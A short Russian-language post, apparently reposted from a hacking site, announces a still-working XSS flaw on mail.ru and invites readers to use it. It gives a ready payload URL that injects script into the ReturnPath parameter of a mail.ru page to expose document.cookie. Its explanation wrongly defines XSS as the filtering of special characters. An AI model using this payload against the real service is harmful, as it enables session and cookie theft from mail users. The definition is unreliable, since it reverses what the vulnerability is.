XSS уязвимость на mail.ru

Найден XSS баг на mail.ru. Найден довольно давно, однако полностью работает на данный момент и есть возможность его использовать.
http://win.mail.ru/cgi-bin/sendmsgok?ReturnPath=] [script[alert(document.cookie); alert(‘Visit www.web-hack.ru ;)’);[/script]
XSS — это фильтрация специальных символов во входном или выходном потоке. При этом традиционно фильтруются символы , а также » ‘ & %. Все эти символы имеют ASCII код меньший 128, и поэтому, в большинстве кодировок кодируются одним байтом, значение которого совпадает с ASCII-кодом символа. (прим. exploit.in).

Источник: Web-Hack